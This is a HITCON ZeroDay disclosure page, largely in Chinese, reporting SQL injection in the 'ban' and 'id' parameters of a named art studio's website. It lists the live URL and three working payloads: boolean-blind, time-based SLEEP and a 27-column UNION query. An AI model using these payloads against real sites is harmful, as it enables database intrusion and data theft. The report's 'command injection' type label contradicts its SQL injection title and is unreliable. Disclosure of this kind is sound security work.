Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2022-00116
- 發信 Vendor: 日月齋工作室 黃明勝書畫天地
- Title: 日月齋工作室 黃明勝書畫天地,網站參數存在 SQL injection
- Introduction: 網站參數存在 SQL injection
處理狀態
目前狀態
公開
Last Update : 2022/04/22
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2022/02/20 18:34:08 : 新提交 (由 P@ssw0rd 更新此狀態)
- 2022/02/25 11:17:08 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/02/25 11:30:39 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/02/25 11:30:39 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/04/07 14:41:15 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/04/07 14:41:15 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/04/07 14:41:15 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/04/22 03:00:16 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2022-00116
- 通報者:wucy0612 (P@ssw0rd)
- 風險:中
- 類型:指令注入攻擊 (Command Injection)
參考資料
攻擊者可經由該漏洞執行任意系統指令,取得系統權限,同時也有機會對資料進行破壞或修改。
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
https://cwe.mitre.org/data/definitions/77.html
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
https://cwe.mitre.org/data/definitions/77.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
https://www.goldenart.biz/index.php?ban=news_detail&act=article&id=245
敘述
https://www.goldenart.biz/index.php?ban=news_detail&act=article&id=245
Parameter: ban (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ban=news_detail' AND 7173=7173 AND 'WSyO'='WSyO&act=article&id=245
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: ban=news_detail' AND (SELECT 8925 FROM (SELECT(SLEEP(10)))kzVa) AND 'JJqB'='JJqB&act=article&id=245
Type: UNION query
Title: MySQL UNION query (NULL) - 27 columns
Payload: ban=-4218' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627a71,0x467357656e456f4c437a6f634953446a5279524571554c4b415a4878505a70414157504550584742,0x71706a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&act=article&id=245id 跟 ban 參數都有 SQLI
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。